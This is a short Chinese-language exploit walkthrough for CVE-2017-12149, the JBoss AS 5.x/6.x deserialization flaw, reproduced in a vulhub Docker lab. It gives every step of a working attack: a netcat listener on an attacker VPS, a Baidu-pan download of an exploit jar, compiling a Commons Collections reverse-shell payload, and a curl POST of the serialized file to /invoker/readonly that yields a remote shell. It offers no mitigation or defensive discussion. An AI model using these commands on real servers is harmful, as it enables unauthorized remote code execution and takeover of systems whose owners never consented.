一、漏洞影响范围
漏洞影响5.x和6.x版本的JBOSSAS
二、复现过程
1.1.1.1 公网vps,用来接收反弹的shell
2.2.2.2 被攻击的jboss服务器
1、复现环境用的vulhub,直接docker构建下就可以
cd CVE-2017-12149
docker compose up -d
2、docker构建好以后,启动docker
docker start 44a1db984d24
3、访问对应的端口,页面如下
4、先在自己的公网vps上开启监听
nc -lvp 6666
5、获取jar包放到攻击机上
https://pan.baidu.com/s/1AB6N1x4Sq3GYVgyFGZAhoQ
提取码:ga4a
6、执行如下命令,生成ReverseShellCommonsCollectionsHashMap.ser
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 1.1.1.1:6666 #你之前监听的地址及端口,用来接受shell
7、利用curl访问发起攻击
curl http://2.2.2.2:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
可以看到之前监听的vps上接收到了shell